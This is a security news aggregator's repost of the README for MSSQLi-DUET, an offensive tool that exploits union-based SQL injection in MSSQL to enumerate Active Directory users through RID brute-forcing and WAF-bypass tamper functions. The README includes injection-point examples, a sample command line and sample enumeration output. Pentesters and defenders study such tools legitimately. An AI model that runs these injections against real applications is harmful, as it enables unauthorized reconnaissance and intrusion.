Cookie Consent by Free Privacy Policy Generator ๐Ÿ“Œ MSSQLi-DUET - SQL Injection Script For MSSQL That Extracts Domain Users From An Active Directory Environment Based On RID Bruteforcing

๐Ÿ  Team IT Security News

TSecurity.de ist eine Online-Plattform, die sich auf die Bereitstellung von Informationen,alle 15 Minuten neuste Nachrichten, Bildungsressourcen und Dienstleistungen rund um das Thema IT-Sicherheit spezialisiert hat.
Ob es sich um aktuelle Nachrichten, Fachartikel, Blogbeitrรคge, Webinare, Tutorials, oder Tipps & Tricks handelt, TSecurity.de bietet seinen Nutzern einen umfassenden รœberblick รผber die wichtigsten Aspekte der IT-Sicherheit in einer sich stรคndig verรคndernden digitalen Welt.

16.12.2023 - TIP: Wer den Cookie Consent Banner akzeptiert, kann z.B. von Englisch nach Deutsch รผbersetzen, erst Englisch auswรคhlen dann wieder Deutsch!

Google Android Playstore Download Button fรผr Team IT Security



๐Ÿ“š MSSQLi-DUET - SQL Injection Script For MSSQL That Extracts Domain Users From An Active Directory Environment Based On RID Bruteforcing


๐Ÿ’ก Newskategorie: IT Security Nachrichten
๐Ÿ”— Quelle: feedproxy.google.com


SQL injection script for MSSQL that extracts domain users from an Active Directory environment based on RID bruteforcing. Supports various forms of WAF bypass techniques through the implementation of SQLmap tamper functions. Additional tamper functions can be incorporated by the user depending on the situation and environment.
Comes in two flavors: straight-up Python script for terminal use, or a Burp Suite plugin for simple GUI navigation.
Currently only supports union-based injection at the moment. More samples and test cases are required to fully test tool's functionality and accuracy. Feedback and comments are greatly welcomed if you encounter a situation it does not work.
Custom tailoring the script and plugin to your needs should not be too difficult as well. Be sure to read the Notes section for some troubleshooting.

Burp Suite Plugin
After loading the plugin into Burp Suite, right-click on a request and send it to MSSQLi-DUET. More details on the parameters and such are described below.
The request will populate in the request window, and only the fields above it need to be filled out. After hitting run the output will be placed in the results output box for easy copy pasting.

Python Script Usage

Script Help
python3 mssqli-duet.py -h
usage: mssqli-duet.py [-h] -i INJECTION [-e ENCODING] -t TIME_DELAY -rid
RID_RANGE [-ssl SSL] -p PARAMETER [-proxy PROXY]
[-o OUTFILE] -r REQUEST_FILE

MSSQLi-DUET - MSSQL (Injection-based) Domain User Enumeration Tool

optional arguments:
-h, --help show this help message and exit
-i INJECTION, --injection INJECTION
Injection point. Provide only the data needed to
escape the query.
-e ENCODING, --encoding ENCODING
Type of encoding: unicode, doubleencode, unmagicquotes
-t TIME_DELAY, --time_delay TIME_DELAY
Time delay for requests.
-rid RID_RANGE, --rid_range RID_RANGE
Hypenated range of RIDs to brute force. Ex: 1000-1200
-ssl SSL, --ssl SSL Add flag for HTTPS
-p PARAMETER, --parameter PARAMETER
Vulnerable parameter
-proxy PROXY, --proxy PROXY
Proxy connection string. Ex: 127.0.0.1:8080
-o OUTFILE, --outfile OUTFILE
Outfile for username enumeration results.
-r REQUEST_FILE, --request_file REQUEST_FILE
Raw request file saved from Burp

Prepare to be enumerated!

How to use
After identifying a union-based SQL injection in an application, copy the raw request from Burp Suite using the 'copy to file' feature.
Pass the saved request to DUET with the -r flag. Specify the vulnerable parameter and well as the point of injection. As an example, if the parameter "element" is susceptible to SQL injection, -p will be "element". DUET will build out all the SQL injection queries automatically, but specification for the initial injection needs to be provided. Meaning, if the injection occurs because of a single apostrophe after the parameter data, this is what would be specified for the -i argument.
Ex: test' 
test'))
test")"

Example
python3 mssqli-duet.py -i "carbon'" -t 0 -rid 1000-1200 -p element -r testrequest.req -proxy 127.0.0.1:8080
[+] Collected request data:
Target URL = http://192.168.11.22/search2.php?element=carbon
Method = GET
Content-Type = applcation/x-www-form-urlencoded


[+] Determining the number of columns in the table...
[!] Number of columns is 3
[+] Determining column type...
[!] Column type is null
[+] Discovering domain name...
[+] Domain = NEUTRINO
[+] Discovering domain SID...
S-1-5-21-4142252318-1896537706-4233180933-

[+] Enumerating Active Directory via SIDs...

NEUTRINO\HYDROGENDC01$
NEUTRINO\DnsAdmins
NEUTRINO\DnsUpdateProxy
NEUTRINO\HELIUM$
NEUTRINO\BORON$
NEUTRINO\BERYLLIUM$
NEUTRINO\aeinstein
NEUTRINO\bbobberson
NEUTRINO\csagan
NEUTRINO\ccheese
NEUTRINO\svc_web
NEUTRINO\svc_sql

Notes
The script may need to be modified depending on the casting and type limitations of the columns that are discovered.
This includes modifications to switch the column position of the payload, and also modifying the query strings themselves to account for column types that will not generate errors.
Additionally, the logic for determining the number of columns is currently not the greatest, and certain comparisons maybe need to be commented out to ensure proper determination takes place.
Overall, just take a look at the requests being sent in Burp and tailor the script as necessary to the SQL injection environment you find yourself in.

References
https://blog.netspi.com/hacking-sql-server-procedures-part-4-enumerating-domain-accounts/


...



๐Ÿ“Œ Your Active DAD (Active Domain Active Defense) Primer


๐Ÿ“ˆ 36.77 Punkte

๐Ÿ“Œ WEBCAST: Active Domain Active Defense (Active DAD) Primer with John Strand


๐Ÿ“ˆ 36.77 Punkte

๐Ÿ“Œ Zracker - Zip File Password BruteForcing Utility Tool based on CPU-Power


๐Ÿ“ˆ 33.04 Punkte

๐Ÿ“Œ mssql.js on Node.js Environment Variable privilege escalation


๐Ÿ“ˆ 32.17 Punkte

๐Ÿ“Œ mssql.js auf Node.js Environment Variable erweiterte Rechte [CVE-2017-16056]


๐Ÿ“ˆ 32.17 Punkte

๐Ÿ“Œ Active Directory Domains and Forests Introduction โ€“ Best Active Directory Tools


๐Ÿ“ˆ 30.82 Punkte

๐Ÿ“Œ Active Directory Domains and Forests Introduction โ€“ Best Active Directory Tools


๐Ÿ“ˆ 30.82 Punkte

๐Ÿ“Œ Vulnerable-AD - Create A Vulnerable Active Directory That'S Allowing You To Test Most Of Active Directory Attacks In Local Lab


๐Ÿ“ˆ 30.82 Punkte

๐Ÿ“Œ SilentHound โ€“ Quietly Enumerate An Active Directory Domain Via LDAP Parsing Users, Admins, Groups, Etc.


๐Ÿ“ˆ 30.51 Punkte

๐Ÿ“Œ SilentHound โ€“ Quietly Enumerate An Active Directory Domain Via LDAP Parsing Users, Admins, Groups, Etc.


๐Ÿ“ˆ 30.51 Punkte

๐Ÿ“Œ SilentHound - Quietly Enumerate An Active Directory Domain Via LDAP Parsing Users, Admins, Groups, Etc.


๐Ÿ“ˆ 30.51 Punkte

๐Ÿ“Œ Brave passes 15 million monthly active users and 5 million daily active users, showing 2.25x MAU growth in the past year


๐Ÿ“ˆ 28.9 Punkte

๐Ÿ“Œ Kali Linux - Facebook Bruteforcing


๐Ÿ“ˆ 27.72 Punkte

๐Ÿ“Œ Kali Linux - WPA/WPA2 Bruteforcing [+Wordlists]


๐Ÿ“ˆ 27.72 Punkte

๐Ÿ“Œ Kali Linux - Twitter Bruteforcing


๐Ÿ“ˆ 27.72 Punkte

๐Ÿ“Œ Kerbrute - A Tool To Perform Kerberos Pre-Auth Bruteforcing


๐Ÿ“ˆ 27.72 Punkte

๐Ÿ“Œ Kerbrute - A Tool To Perform Kerberos Pre-Auth Bruteforcing


๐Ÿ“ˆ 27.72 Punkte

๐Ÿ“Œ DNS Bruteforcing And Subdomain Enumeration With Fierce & Nmap


๐Ÿ“ˆ 27.72 Punkte

๐Ÿ“Œ Android-PIN-Bruteforce - Unlock An Android Phone (Or Device) By Bruteforcing The Lockscreen PIN


๐Ÿ“ˆ 27.72 Punkte

๐Ÿ“Œ Experts found a new TrickBot module (rdpScanDll) built for RDP bruteforcing operations


๐Ÿ“ˆ 27.72 Punkte

๐Ÿ“Œ PySQLRecon - Offensive MSSQL Toolkit Written In Python, Based Off SQLRecon


๐Ÿ“ˆ 27.6 Punkte

๐Ÿ“Œ 5 vulnerabilities in Samba. One critical flaw CVE-2022-32744 allows Active Directory users to change passwords of other users


๐Ÿ“ˆ 26.25 Punkte

๐Ÿ“Œ Talon - A Password Guessing Tool That Targets The Kerberos And LDAP Services Within The Windows Active Directory Environment


๐Ÿ“ˆ 25.29 Punkte

๐Ÿ“Œ How to reset Kerberos account passwords in an Active Directory environment


๐Ÿ“ˆ 25.29 Punkte

๐Ÿ“Œ GOAD: Vulnerable Active Directory environment for practicing attack techniques


๐Ÿ“ˆ 25.29 Punkte

๐Ÿ“Œ Wie arbeiten die Active Directory Domain Services?


๐Ÿ“ˆ 25.09 Punkte

๐Ÿ“Œ Wie arbeiten die Active Directory Domain Services?


๐Ÿ“ˆ 25.09 Punkte

๐Ÿ“Œ What's the best guide to joining CentOS 7 to an MS Active Directory domain?


๐Ÿ“ˆ 25.09 Punkte

๐Ÿ“Œ How to Add Hostname in Active Directory and Add Client System in Domain


๐Ÿ“ˆ 25.09 Punkte

๐Ÿ“Œ Samba up to 4.7.8/4.8.3 Active Directory Domain Controller NULL Pointer Dereference denial of service


๐Ÿ“ˆ 25.09 Punkte

๐Ÿ“Œ Samba up to 4.10.14/4.11.7/4.12.1 Active Directory Domain Controller resource consumption


๐Ÿ“ˆ 25.09 Punkte

๐Ÿ“Œ Active Directory Plugin up to 2.19 on Jenkins Domain Health Check Diagnostic Page authorization


๐Ÿ“ˆ 25.09 Punkte

๐Ÿ“Œ Joining an Ubuntu Server 18.04.1 LTS to an Windows Active Directory Domain


๐Ÿ“ˆ 25.09 Punkte











matomo